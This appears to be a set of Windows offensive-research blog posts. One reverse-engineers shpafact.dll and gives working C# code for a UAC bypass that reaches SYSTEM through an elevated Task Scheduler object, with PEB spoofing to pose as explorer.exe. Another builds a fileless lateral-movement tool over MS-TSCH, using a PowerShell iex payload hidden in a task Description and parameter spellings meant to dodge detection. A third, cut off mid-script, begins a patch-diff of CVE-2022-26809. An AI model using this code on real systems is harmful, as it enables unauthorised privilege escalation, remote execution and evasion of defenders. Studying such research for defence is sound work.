%SystemRoot%\System32\shpafact.dll contains very little code, so five minutes of quick analysis is enough. First, according to https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-dllgetclassobject, COM creates instances through the fixed export DllGetClassObject; shpafact.dll implements CClassFactory as its factory class.


CClassFactory can create several objects. Our target component A6BFEA43-501F-456F-A845-983D3AD7B8F0 is neither of the two known CLSIDs, so execution falls into the bottom branch, CElevatedFactoryServer::CreateInstance.


CElevatedFactoryServer::CreateInstance ends up simply returning a CElevatedFactoryServer object instance.


The CElevatedFactoryServer object inherits from IUnknown and has only a single object method, ServerCreateInstance.


The signature of ServerCreateInstance is HRESULT __thiscall ServerCreateInstance(REFCLSID, REFIID, PVOID*); when the REFCLSID argument is registered under the VirtualServerObjects registry key, it directly creates an object of the specified CLSID.


From the QueryInterface method we learn that IID_ElevatedFactoryServer is 804bd226-af47-4d71-b492-443a57610b08.


At this point we have everything a COM call needs - the CLSID, the IID, and the vtable method signature - and a little tidying-up yields the following IDL:

[uuid(804bd226-af47-4d71-b492-443a57610b08)]
interface IElevatedFactoryServer : IUnknown {
    HRESULT _stdcall ServerCreateInstance(REFCLSID rclsid,REFIID riid,LPVOID* ppvobj);
};

[uuid(A6BFEA43-501F-456F-A845-983D3AD7B8F0)]
coclass ElevatedFactoryServer {
    interface IElevatedFactoryServer;
};

0x04 Invocation

With the IDL in hand, just call it from whatever language is convenient, for example by converting it to the equivalent C# interop code:

[Guid("804bd226-af47-4d71-b492-443a57610b08")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IElevatedFactoryServer
{
  [return: MarshalAs(UnmanagedType.Interface)]
  object ServerCreateElevatedObject([In, MarshalAs(UnmanagedType.LPStruct)] Guid rclsid, [In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);
}

We need to create the elevated COM object, so activation must go through CoGetObject together with the Elevation Moniker:

BIND_OPTS3 opt = new BIND_OPTS3();
opt.cbStruct = (uint)Marshal.SizeOf(opt);
opt.dwClassContext = 4;
var srv = CoGetObject("Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}", ref opt, new Guid("{00000000-0000-0000-C000-000000000046}")) as IElevatedFactoryServer;

Then call the ServerCreateElevatedObject method to obtain an ITaskService instance:

var svc = srv.ServerCreateElevatedObject(new Guid("{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}"), new Guid("{00000000-0000-0000-C000-000000000046}")) as ITaskService;

This ITaskService instance actually runs inside the elevated process, so we can create a scheduled task that runs with the full token by using the TASK_RUNLEVEL_HIGHEST flag, which is equivalent to setting Task\Principals\Principal\RunLevel to HighestAvailable in the XML file:

<Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
</Principals>

Register the task with this XML:

svc.Connect();
var folder = svc.GetFolder("\\");
var task = folder.RegisterTask("Test Task", xml, 0, null, null, TaskLogonType.InteractiveToken, null);
task.Run(null);

And don't forget to patch the current process's PEB:

var fake = "explorer.exe";
var fake2 = @"c:\windows\explorer.exe";
var PPEB = RtlGetCurrentPeb();
PEB PEB = (PEB)Marshal.PtrToStructure(PPEB, typeof(PEB));
bool x86 = Marshal.SizeOf(typeof(IntPtr)) == 4;
var pImagePathName = new IntPtr(PEB.ProcessParameters.ToInt64() + (x86 ? 0x38 : 0x60));
var pCommandLine = new IntPtr(PEB.ProcessParameters.ToInt64() + (x86 ? 0x40 : 0x70));
RtlInitUnicodeString(pImagePathName, fake2);
RtlInitUnicodeString(pCommandLine, fake2);

PEB_LDR_DATA PEB_LDR_DATA = (PEB_LDR_DATA)Marshal.PtrToStructure(PEB.Ldr, typeof(PEB_LDR_DATA));
LDR_DATA_TABLE_ENTRY LDR_DATA_TABLE_ENTRY;
var pFlink = new IntPtr(PEB_LDR_DATA.InLoadOrderModuleList.Flink.ToInt64());
var first = pFlink;
do
{
    LDR_DATA_TABLE_ENTRY = (LDR_DATA_TABLE_ENTRY)Marshal.PtrToStructure(pFlink, typeof(LDR_DATA_TABLE_ENTRY));
    if (LDR_DATA_TABLE_ENTRY.FullDllName.Buffer.ToInt64() < 0 || LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer.ToInt64() < 0)
    {
        pFlink = LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink;
        continue;
    }
    try
    {
        if (Marshal.PtrToStringUni(LDR_DATA_TABLE_ENTRY.FullDllName.Buffer).EndsWith(".exe"))
        {
            RtlInitUnicodeString(new IntPtr(pFlink.ToInt64() + (x86 ? 0x24 : 0x48)), fake2);
            RtlInitUnicodeString(new IntPtr(pFlink.ToInt64() + (x86 ? 0x2c : 0x58)), fake);
            LDR_DATA_TABLE_ENTRY = (LDR_DATA_TABLE_ENTRY)Marshal.PtrToStructure(pFlink, typeof(LDR_DATA_TABLE_ENTRY));
            break;
        }
    }
    catch { }
    pFlink = LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink;
} while (pFlink != first);

Compile and run; barring surprises, the command specified in the XML (cmd here) now runs with the elevated identity.


With that, we have successfully discovered an unpublished UAC bypass.

But this is not the end. Earlier we mentioned modifying the value of the XML file's Principal node to register a task that runs with the full token; the schema of this node is documented in MS-TSCH 2.5.6 Principal Schema Part, https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/b9420a4c-fe40-45a0-ae85-2d57e051409b.

According to the documentation, the Principal node may contain a UserId child node that supplies the identity the task runs under; its format may be a user name, a SID, a UPN or an FQDN.

So we can simply set UserId to SYSTEM in the XML:

<Principals>
    <Principal id="Author">
      <UserId>SYSTEM</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
</Principals>

After that, the command we specify runs directly as SYSTEM.


In other words: with one fileless UAC bypass we get SYSTEM directly.

0x05 Mechanism

At this point, the road from plain "security research" to a weaponized result is finished.

But from a pure knowledge standpoint, it is not enough.

Rewind your thinking to section 0x01 Fundamentals, reopen MSDN, compare the complete target registry key, and let's close this article with its single most important piece of theory.

We know that a UAC-elevated COM object must be activated with the CoGetObject function together with the Elevation Moniker; this behavior is documented at https://docs.microsoft.com/en-us/windows/win32/com/the-com-elevation-moniker

Looking at the sample code in that article, note that Microsoft uses CLSCTX_LOCAL_SERVER as the activation context flag, which asks DCOMLaunch to create a new out-of-process COM object. The A6BFEA43-501F-456F-A845-983D3AD7B8F0 object, however, is only configured with InProcServer32, which results in Surrogate Activation: https://docs.microsoft.com/en-us/windows/win32/com/registering-the-dll-server-for-surrogate-activation

There are two important points about surrogate activation. First, from a security-research standpoint, surrogate activation configured with an APPID usually comes with custom permission checks.

According to https://docs.microsoft.com/en-us/windows/win32/com/launchpermission and https://docs.microsoft.com/en-us/windows/win32/com/accesspermission, the default implicit permission check is governed jointly by HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{APPID}@LaunchPermission and HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{APPID}@AccessPermission, whose values are Security Descriptor (SD) binary form.

So we need to confirm that we are allowed to make the call. The binary security descriptor is not human-readable, so parse and print it with PowerShell:

$x=get-itemproperty 'hklm:\software\classes\appid\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}'
(new-object System.Security.AccessControl.RawSecurityDescriptor($x.LaunchPermission,0)).DiscretionaryAcl|fl
(new-object System.Security.AccessControl.RawSecurityDescriptor($x.AccessPermission,0)).DiscretionaryAcl|fl

The output will look something like this:

BinaryLength       : 20
AceQualifier       : AccessAllowed
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 3
SecurityIdentifier : S-1-5-4
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None

According to https://docs.microsoft.com/en-us/windows/win32/secauthz/well-known-sids, S-1-5-4 is NT AUTHORITY\INTERACTIVE; every interactively logged-on user is granted this group, which whoami /groups also confirms:

whoami /groups

组信息
-----------------

组名                                   类型   SID          属性
====================================== ====== ============ ==============================
Everyone                               已知组 S-1-1-0      必需的组, 启用于默认, 启用的组
NT AUTHORITY\本地帐户和管理员组成员    已知组 S-1-5-114    只用于拒绝的组
BUILTIN\Administrators                 别名   S-1-5-32-544 只用于拒绝的组
BUILTIN\Performance Log Users          别名   S-1-5-32-559 必需的组, 启用于默认, 启用的组
BUILTIN\Users                          别名   S-1-5-32-545 必需的组, 启用于默认, 启用的组
NT AUTHORITY\INTERACTIVE               已知组 S-1-5-4      必需的组, 启用于默认, 启用的组
CONSOLE LOGON                          已知组 S-1-2-1      必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users       已知组 S-1-5-11     必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization         已知组 S-1-5-15     必需的组, 启用于默认, 启用的组
NT AUTHORITY\本地帐户                  已知组 S-1-5-113    必需的组, 启用于默认, 启用的组
LOCAL                                  已知组 S-1-2-0      必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication       已知组 S-1-5-64-10  必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Mandatory Level 标签   S-1-16-8192

So it is only because we are logged on interactively that we have permission to activate and call the elevated COM component.

Second, from a program-design standpoint, look at the definition of the COM Proxy. As described at https://docs.microsoft.com/en-us/windows/win32/com/proxy, the proxy object lives in the caller's process and stands in for the remote object; from the caller's point of view, calling the proxy object is indistinguishable from calling the real object directly.

This is a complete object proxy that applies and obeys the proxy pattern: the proxy object's appearance, exposed methods and calling convention are exactly the same as the real object's.

From a web-security angle, think of the generic object returned by the InvocationHandlerUtil used all over ysoserial, or the wrapper you write, after hijacking a Tomcat Filter or Spring Controller with a RetransformAgent, so the business keeps running; from a developer's angle, it is the same as any AOP you have ever used.

So the operations we performed in 0x04 Invocation translate to:

1. We ask the COM activator to bind the object behind the Moniker Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}; because the activation context flag is CLSCTX_LOCAL_SERVER, the local COM client (combase.dll) asks the DCOM service to issue an Out-Of-Process, Elevated activation request.
2. DCOM, based on the component's registration info and the Activation Context, verifies that the A6BFEA43-501F-456F-A845-983D3AD7B8F0 object may be elevated (in practice this calls into the AppInfo service) and that the current user has activation permission (an explicit DACL containing the enabled group S-1-5-4).
3. The DCOM service performs the activation in a new, separate, elevated process and creates the Real Object.
4. DCOM tells the local COM client that activation succeeded (HRESULT=S_OK); the local client creates a Proxy for the real object in the current process as the actual communication target.
5. The current process calls instance methods on the proxy object; those methods are actually handled by the remote object.
6. Per the method signature, the call returns a new ITaskService object reference. Since the ITaskService object implements no additional Marshalling interface, COM applies its default packaging and returns a Remote Object Reference (ObjRef).
7. The local client creates a Proxy for the ITaskService object in the current process, in the form of a Proxy Object.
8. Per MSDN, a remote object reference is, to the caller, equivalent to the real object; per the CLSID, the real object is an ITaskService.
9. In an unelevated process we have obtained a proxy for an ITaskService object that lives in an elevated process, and every operation on the proxy is forwarded unconditionally to the real object.
10. Create a scheduled task flagged TASK_RUNLEVEL_HIGHEST, or running as any other user (SYSTEM, say). UAC bypass complete.

If you have had the patience to read this far, make sure the term proxy pattern and what it means stick with you. In this article we have just watched a real-world Russian-doll stack of proxies; understand the design idea behind this pattern, because you will meet it again in every line of code you write, every feature you audit, and every business flow you test.

Now we can answer the questions posed in 0x00:

1. There is indeed an undocumented COM component through which we can invoke the Task Scheduler component in a way we control.
2. The component is configured for UAC elevation; through the default COM proxy it creates, inside the elevated surrogate process, an in-process COM object chosen from a known allow-list of CLSIDs, and then hands it back through the COM proxy to the caller, to be used by the unelevated process.
3. Because the allow-list contains exactly one entry, 0f87369f-a4e5-4cfc-bd3e-73e6154572dd, i.e. the Task Scheduler (TaskService), an unelevated process can obtain an elevated TaskService object.
4. Calling that object lets us create a scheduled task that runs with full privileges, completing the UAC bypass.

0x06 Summary

This article can be seen as the start of branching out from theory and landing in practical application. It takes the previous article - the documented MS-TSCH protocol and its XML - as the foundation, fills the gaps with COM fundamentals, then digs up a research target worth pursuing and turns it into a tool and code with real-world value; finally we re-organize the relevant knowledge, use this example to revisit the many fine points of COM, and verify them one by one in practice, closing the knowledge loop.

The code for this article is at https://github.com/zcgonvh/TaskSchedulerMisc/. It compiles and runs as-is, but I still do not recommend using it directly - that does nothing for your skills.
(Also: please abide by the criminal law, the Cybersecurity Law and related regulations; I am merely sharing knowledge, and any consequences of misuse are on you.)
(And please respect the open-source license; copying code to "weaponize" it is pretty boring, isn't it?)

Of course this article is not exhaustive: all we did was follow the registry and, based on the component's behavior, find one UAC bypass.

Many other angles remain - continuing the Task Scheduler tracing from the end of 0x01, or digging into UAC or even COM all over again - and from a research standpoint there are plenty of details worth expanding on.

For reasons of length, some of those extensions will be covered later in other series.

Finally, as always: the point of the article is to pass on knowledge; a thesis-style summary does nothing except make the article look fuller. Security research is a strongly knowledge-driven field with no shortcuts - only accumulated knowledge ties everything together, until quantity finally turns into quality.

I hope this article gives you something beyond the specific technical points.

Advanced Windows Task Scheduler Playbook - Part.3 from RPC to lateral movement

0x00 The Problem

Picking up where we left off: by tracing and studying local calls into the Task Scheduler component, we combined COM, UAC and ITaskService rather neatly and found a new UAC bypass - or rather, a new attack surface.

Now let's widen the view again. Recall Part 1: at the very start we established that the Task Scheduler is, at its core, an RPC interface with XML as its data carrier. In Microsoft's words, RPC is for calls across processes, whether or not the processes are on the same host.

So the RPC-based Task Scheduler is inherently suited to lateral movement.

This is nothing new, of course. Those of us who did not work ourselves to death in early August have once again had a good time with atexec, schtasks and even the ancient at.exe. All of these, without exception, abuse the Task Scheduler component's RPC interface for lateral movement. In the known approaches we get output back by executing a command remotely, writing a file, and finally reading it over a file share - or we skip output entirely and get an implant up through one of the many fileless techniques.

In real engagements these all run into problems sooner or later. The file-based output trick can hit unusual environments where the share is unreachable or the SMB dialects are incompatible; and beyond environmental constraints, in an adversarial setting the bigger threat is being "known": a known attack technique always has a matching detection.

Which leads to a very practical problem:

Tools, weapons, platforms - however perfectly they run in the lab, in a real environment they can always turn out to be "not quite usable".

Exploring new methods is always the first task of the game. So, driven by real-world needs, we set ourselves a new topic: how do we get more reliable output and environment reconnaissance during lateral movement?

0x01 Thinking

Security research is never blind problem-solving. Here our end goal is a lateral-movement technique that is (in some environments) comparatively better; technical problems usually decompose into a series of progressive steps, so let's refine the question:

What stages does lateral movement involve? Which techniques appear at each stage? What are the strengths and weaknesses of each?

Following that thread brings out the technical details below:

Lateral movement needs a connection to the target, which at the network level means a protocol, so the first sub-question is:
Which protocol do we use?

A protocol carries a service, and non-exploit lateral movement is essentially abuse of a service's features, so the second sub-question:
Which features offered by the service itself can we use to gain execution?

Once execution is obtained, a real engagement usually needs results fed back, so the third sub-question:
Can the service itself return results directly? If not, what extra means do we need?

And finally, the evergreen question of real-world operations:
Do the implementations above have known signatures?

Stringing these stages together gives the complete flow we are after. Compare this with a deserialization chain or ROP: treat the whole procedure as the Chain, treat each step's candidate implementations as independent, connectable Gadgets, and treat the detection points as the blacklist. Combining what we already know, it is easy to draw up a simple (and incomplete) table like this:

Protocol    Service   Execution          Return channel          Detection points
SMB         ATSVC     command            file share              cmd /c redirection, files dropped on disk
SMB         SRVSVC    service            file share              cmd /c redirection, files dropped on disk
RPC/DCOM    WMI       command / service  file share / registry   cmd /c redirection, SMB dependency, traffic UUID

See - threat intelligence and security research just linked up, and so did web security and red teaming.

Since the Task Scheduler is what we are studying, the obvious next question: can scheduled tasks do this?
Given the results of the previous two articles, it is not hard to answer:

1. MS-TSCH is based on RPC, cannot be turned off, and is reachable in most situations.
2. ExecAction gives unrestricted command execution; and once a file and registry entries are written, ComHandlerAction gives unrestricted code execution.
3. Internally the protocol transmits the complete XML definition verbatim, UTF-16 encoded, back to the client - and its Description element can hold any string content without restriction.



4. At the traffic level only the handshake can be caught via its UUID, and alerting or blocking on that outright may break server administration; at the host level the process chain consists entirely of allow-listed binaries. ExecAction does not support output redirection, so fileless techniques are needed; ComHandlerAction needs fileless techniques or some other way to write the file and registry entries.

So our table gains these two additional rows:

Protocol    Service   Execution                     Return channel     Detection points
RPC         TSCH      command (ExecAction)          native protocol    traffic UUID, fileless-attack detection
RPC         TSCH      command (ComHandlerAction)    native protocol    traffic UUID, file/registry dropped on disk

Considering complexity, the fileless ExecAction clearly beats ComHandlerAction, which needs a lot written to disk.

So our problem has shifted, quite naturally, from lateral movement to fileless attack trade-craft.

And this technique is at least ten years old: its usage is thoroughly mature and its variations plentiful, which means we have many smooth ways to implement it. In our scenario we need a fileless way to execute a command or perform reconnaissance, and then modify the scheduled task's information as the return channel.
Obviously any script-based fileless technique can do this - mshta, the various sct and xslt flavors, cmd, and PowerShell.
Rule out cmd first; next, the techniques based on Windows Script Host need to make outbound http or smb requests, and dropping files invites unnecessary trouble. So PowerShell, which delivers a full scripting runtime from a single command line, is the natural first choice.

0x02 Implementation

With the technical points settled, implementation is trivial.

First, following the previous two chapters - whether copying the MSDN samples, compiling the IDL ourselves, or using the C# interop - we can connect to a remote target directly; all that is needed when using raw RPC is to specify the correct binding and call RpcBindingSetAuthInfoEx:

_SEC_WINNT_AUTH_IDENTITY identity = { 0 };
LPWSTR domain = L"ROOT";
LPWSTR username = L"administrator";
LPWSTR password = L"P@ssw0rd";
identity.Domain = (unsigned short*)domain;
identity.DomainLength = lstrlenW(domain);
identity.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE;
identity.User = (unsigned short*)username;
identity.UserLength = lstrlenW(username);
identity.Password = (unsigned short*)password;
identity.PasswordLength = lstrlenW(password);
RpcBindingSetAuthInfoExW(hBinding, 0, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, &identity, 0, (RPC_SECURITY_QOS*)&qos);

Or specify credentials when calling ITaskService::Connect:

pService->Connect(_variant_t(L"Target"), _variant_t(L"administrator"),_variant_t(L"ROOT"), _variant_t("P@ssw0rd"));

(Feel the benefit of abstraction and transparency yet?)

Second, PowerShell ships a complete object model for scheduled tasks, with a family of cmdlets such as Get-ScheduledTask and Set-ScheduledTask. We don't even need MSDN; the local cmdlet help alone is enough to write a script like this:

$task=Get-ScheduledTask -TaskName TestTask -TaskPath \;
$task.Description=(iex $task.Description|out-string);
Set-ScheduledTask $task;

In this script we use Get-ScheduledTask to fetch the remotely controlled object, execute the command stored in Description with iex, convert the result into a readable string with out-string (everything PowerShell returns is an object), and finally save it back.

A key point of gadget thinking is: if the gadgets are correct and the logic chaining them is correct, the end result must be correct. So next we only need to create a scheduled task, put the command to execute into the XML/Task/RegistrationInfo/Description element, name it TestTask, set the command line to the PowerShell above, and run the task; Description then turns into the command's output (a local end-to-end sketch follows below).
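To make the chain concrete, here is a local end-to-end sketch built on the ScheduledTasks cmdlets (the task name TestTask and the demo command whoami /all are arbitrary; in the real lateral-movement case the registration would of course go through the remote ITaskService/RPC interface described above rather than these local cmdlets):

# 1. The command to run travels in the task's Description field.
$cmd     = 'whoami /all'
# 2. The task's action re-reads its own Description, executes it, and writes the output back.
$payload = '$t=Get-ScheduledTask -TaskName TestTask -TaskPath \; ' +
           '$t.Description=(iex $t.Description|Out-String); Set-ScheduledTask $t'
$enc     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$action  = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument "-NonInteractive -EncodedCommand $enc"
Register-ScheduledTask -TaskName 'TestTask' -Action $action -Description $cmd | Out-Null
Start-ScheduledTask -TaskName 'TestTask'
# 3. Poll until the task is Ready again; the Description now holds the command output.
while ((Get-ScheduledTask -TaskName 'TestTask').State -ne 'Ready') { Start-Sleep -Seconds 1 }
(Get-ScheduledTask -TaskName 'TestTask').Description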


Finally, read the task's XML and pull out the Description content:

var xd=new XmlDocument();
xd.LoadXml(task.Xml);
Console.WriteLine(xd.SelectSingleNode("/*[local-name()='Task']/*[local-name()='RegistrationInfo']/*[local-name()='Description']").InnerText);

0x03 Polish

The thinking-to-implementation exercise above gives us a runnable, working prototype; now let's polish it into something closer to a practical "weapon".

First, we create the scheduled task with ExecAction, which means the script travels on the command line, so it is best to use -EncodedCommand. This is really not about opsec; the main purpose is to avoid the whole family of escaping problems (a one-liner for producing the encoded string is sketched below).
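For reference, the encoded string is nothing more than Base64 over the UTF-16LE bytes of the script text; a one-line sketch:

# -EncodedCommand expects Base64 of the UTF-16LE (Unicode) bytes of the script.
$script = 'Get-ScheduledTask -TaskName TestTask'
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($script))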

On the evasion side, we know PowerShell resolves parameters by case-insensitive prefix matching, so besides the common -e and -enc, -EncodedCommand has roughly ten thousand other spellings, such as:

-eN
-eNCo
-Encode
....

The task runs in the background, so it is best to add -NonInteractive as well; it likewise has ten thousand spellings:

-nonInt
-nOnInTe
....

Against run-of-the-mill defenses that do no lexical analysis, this is basically enough.

Next, since we are moving laterally we cannot know how long the command will take on the target, so we need to poll.

The poll's exit condition must absolutely not be the naive "has Description changed" - it would technically work, but if the script errors out it becomes an infinite loop.

The IRegisteredTask object exposes a State property representing the current task state; when the task finishes running it flips from Running back to Ready, so we simply poll the task state:

while (task.State != TaskState.Ready)
{
    task = folder.GetTask(taskname);
    Thread.Sleep(1000);
}

Then come a few icing-on-the-cake, optional opsec touches. The command content carries none of the usual strong signatures (by which I specifically mean download-and-execute, which many rules treat as the only way PowerShell ever gets abused), so there is almost nothing to deal with.

Likewise, no AV scans a scheduled task's Description property (whether the in-memory object or the XML), so leaving it untouched is also fine by default.

Of course all of that is for later: once this method has some "strong signatures" captured, massaging iex and encoding the returned output will become the next evasion point waiting to be worked on.

Finally, don't forget that iex actually executes a PowerShell script, so what we have is a remote PowerShell (think back to WinRM), which means we can run not only command-line programs


but also arbitrary Cmdlets


and even rather more complex scripts.


Which in turn means that anything .Net can do, we can do remotely, filelessly and - for now - without being detected. With a little more work we could even build a genuinely interactive remote PowerShell implemented purely over MS-TSCH.

(Why did I say earlier that the script might error out? This is why.)

0x04 Reflection

That wraps up the content tied specifically to the Task Scheduler. Let's now step outside it and, from the application-scenario angle, review the options we have had - partly as a short summary, partly to think about how to use them sensibly.

In the lateral-movement scenario, setting aside exploits and scheduled tasks, the most classic and useful techniques are PsExec and WMI.

Why has PsExec endured? Besides the opsec once afforded by a Microsoft signature, it combines movement and output over a single protocol - SMB, which a domain environment must have enabled by default - so for a very long time it was the first choice for internal pentesting. Even today, self-modified PsExec variants based on Impacket or the raw APIs still pull their weight.

Why did everyone later switch to WmiExec? Because the WMI service is likewise on by default and essentially never gets turned off, and stdregprov still allows same-protocol output, so it became the first choice for DCOM-based lateral movement.

Now we have one more option: the RPC-based taskexec.
And yes - it is merely a complement to the existing techniques, not a replacement.

Why?

Because every attack technique inevitably has its own applicability and environmental requirements, and inevitably carries various strong signatures.
Everything that claims to be an undetectable bypass/evasion simply has not had its strong signatures captured yet.
A strong signature means the possibility of being detected and traced.
But no product dares claim 100% detection of a technique and all its variants,
and no product manages 100% hands-off triage either.
Detection and attribution need people,
and so does validating the automated results and acting on them.
Until we phishers retire into actual fishermen, we are unlikely to see AI replace humans at scale in this scenario.

So in a real engagement every alternative is one more Gadget on the road to success. Going a level deeper, the implementations we did not pick back in 0x01 - mshta, sct, ComHandler and the rest - are alternatives too; they are all gadgets usable toward the goal of Task Scheduler-based lateral movement.
Recombine them and you get yet another pile of perfectly serviceable chains.

And the content of this article is itself one larger gadget inside the even larger behavior chain of adversary operations - internal pentest - domain - RPC.

0x05 Summary

This is the third article of the series: we started from an application scenario, ran a feasibility analysis, built a prototype according to that analysis, and finally, with some field experience, polished a brand-new lateral-movement tool.

The joy is in the contest with other people. Security research is, in essence, a game between humans; from a purely technical view, every technique you have truly mastered should become part of your Gadget inventory so that, combined with long-accumulated experience, you can dynamically assemble a sensible Chain as the situation unfolds and let it shine in a real engagement.

Practical application should be an organic composition of knowledge; there is no once-and-for-all, guaranteed trick, but accumulating and understanding knowledge makes everything easier.

(Of course, if what you really want is mindless 1-2-3-4-5, pretend I said nothing.)

The code for this article can be found on Github; this time it is a prototype without any real gotchas and can be used directly, though you had better change a few signatures yourself to avoid collisions.

Once more: I hope this article gives you something beyond the specific technical points.

To be continued....

CVE-2022-26809 Reaching Vulnerable Point starting from 0 Knowledge on RPC

By: s1ckb017
17 June 2022 at 00:00

Lately, alongside malware analysis work, I started studying and testing Windows to understand a bit more about its internals. The CVE analyzed here was a good opportunity to play with RPC and learn fun new things I had never touched before; moreover, it looked challenging enough to be worth the time.

This blog post shows my roadmap for understanding and reproducing the vulnerability. The purpose of the analysis is only to arrive at a PoC, not to understand every bit of the RPC implementation, nor to write an exploit for it.
RPC, to my basic knowledge, was just a way to call procedures remotely: a client asks a server to execute a procedure and gets the result back, much like a syscall crossing from user space to kernel space. This approach lets a software design decouple goals and responsibilities and often leads to good privilege segregation. Beyond that high-level picture, RPC was for me just another attack vector. The RPC protocol is implemented on top of various mediums or transport protocols, e.g. pipes, UDP, TCP.
The vulnerability, as reported by Microsoft, is an RCE in Remote Procedure Call. Neither where the bug is nor how to trigger it is specified, so we have to obtain the patch and diff it against a vulnerable version of the main library implementing RPC, i.e. rpcrt4.dll.

Below are the exact steps I took to reach the vulnerable point, so the blog post is more about finding a way through without having complete knowledge of the analyzed target. The information I gathered about RPC internals is presented here in the order I learned it, not in the structured way one usually writes things up at the end of an analysis.

Search for the vulnerability

Before starting with the usual binary diff, we need the right Windows version in order to get the vulnerable library. I was lucky: my FLARE VM runs Windows 10 version 21H2, which is vulnerable according to the CPE published by NIST. Before patching the system, the Windows symbols (PDB) have to be downloaded so that they are available in Ghidra.

Symbols Download

The symbols can be downloaded with the following commands (the Windows Kits debuggers must be installed):

    cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
    .\symchk.exe  /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll  


After downloading the symbols I opened the supposedly vulnerable rpcrt4.dll in Ghidra, resolved its symbols by loading the right PDB, and exported the binary for BinDiff.

The SHA1 hash of my rpcrt4.dll library is: b35fdb8d452e39cdf4393c09530837eff01d33c7
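(For reproducibility, the hash can be recomputed with PowerShell's built-in cmdlet; the path below assumes a default install:)

# Compute the SHA1 of the RPC runtime library on disk.
Get-FileHash -Algorithm SHA1 C:\Windows\System32\rpcrt4.dll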

Since my Windows version is:

Vulnerable Windows Version


The patch to download, obtained from Microsoft, is the following:

Windows CVE-2022-26809 Patch


After applying the patch the system contains a new rpcrt4.dll having SHA1: d78a9d416a1187da8550fb0d5a4bace48cfa8179

Windows rpcrt4.dll after patch


Bindiff

To load the patched library into Ghidra it was necessary to download the symbols again and import the new PDB. After this operation the two binaries, i.e. the vulnerable one and the patched one, are exported for BinDiff and a binary diff is run on them.

The following image makes it clear that the patch introduced new functions and that some others are no longer present.
Diffing Main Info

Indeed, only 97% similarity, with ~640 unmatched functions. Since I am not an expert in RPC internals, I started investigating the differences from the functions whose similarity is high, tending to 100%.

Low diff functions


I was lucky: the fix seems to be in the ProcessReceivedPDU() routine; indeed, in the new rpcrt4.dll version a function has been added to check the sum of two elements.

Vulnerability


So it seems an integer overflow was the problem in the library.
Now we need to answer a few questions:

  1. Is the fix introduced in other functions?
  2. How can the bug be reached, i.e. what do we need to trigger it?
  3. How can we gain command execution?

The Patch

The fix was introduced by calling a function, i.e. UIntAdd(), to sum two items and check whether an integer overflow happened. The routine is very basic and was already present in the vulnerable library, but it was never called.

UIntAdd()


The fix, as the call references show, was applied to multiple routines, whereas in the vulnerable code the routine is never used.

UIntAdd() call refs.


At this point, given the many new uses of UIntAdd(), I could assume the bug was an integer overflow, but I was not sure which routine is effectively reachable in an easy way for a newbie like me.

UIntAdd() call refs.


UIntAdd() call refs.


UIntAdd() call refs.


Searching for a way to reach the vulnerable point

Since my knowledge of RPC internals was close to zero, the easiest approach for me was to build an RPC client/server example and set breakpoints on the first instruction of the routines that contain the fix:

  1. void OSF_CCONNECTION: OSF_CCALL::ProcessReceivedPDU(OSF_CCALL *this,void *param_1,int param_2) - offset: BaseLibrary + 0x3ac7c
  2. long OSF_CCALL::GetCoalescedBuffer(OSF_CCALL *this,_RPC_MESSAGE *param_1) - offset BaseLibrary + 0xad10c
  3. long OSF_CCALL::ProcessResponse(OSF_CCALL *this,rpcconn_response *param_1,_RPC_MESSAGE *param_2,int *param_3) - offset: BaseLibrary + 0xae3f8
  4. long OSF_SCALL::GetCoalescedBuffer(OSF_SCALL *this,_RPC_MESSAGE *param_1,int param_2) - offset: BaseLibrary + 0xb35fc

The first example I ran, to check whether the vulnerable code is reached in some way, is a basic RPC client/server with Windows NT authentication and several protocols selectable by argument; the example used in this phase is available at: Github

The github link above contains a basic RPC server/client with customizable endpoint/protocol selection and basic WINNT authentication on the connection only, RPC_C_AUTHN_LEVEL_CONNECT.

The supported protocols are:

  1. ncacn_np - named pipes are the medium Doc
  2. ncacn_ip_tcp - TCP/IP is the stack on which the RPC messages are sent, indeed the endpoint is a server and port Doc
  3. ncacn_http - IIS is the protocol family, the endpoint is specified with just a port number Doc
  4. ncadg_ip_udp - UDP/IP is the protocol stack on which RPC messages are sent, this is obsolete.
  5. ncalrpc - the protocol is the local interprocess communication, the endpoint is specified with a string at most 53 bytes long Doc

In my initial tests I ran the example, RPCServerTest.exe 1 5000, using TCP/IP as the protocol in order to inspect packets with Wireshark. RPC sits on top of some transport protocol, which can vary, and on top of that there is of course a common protocol used to call remote procedures, i.e. to pass serialized parameters and choose the routine to execute.

So I ran the example under x64dbg and put breakpoints on the main patched functions, using the following script:

$base_rpcrt4 = rpcrt4:base

$addr = $base_rpcrt4 + 0x3ac7c
lblset $addr, "OSF_SCALL::ProcessReceivedPDU_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xad10c
lblset $addr, "OSF_CCALL::GetCoalescedBuffer_start"
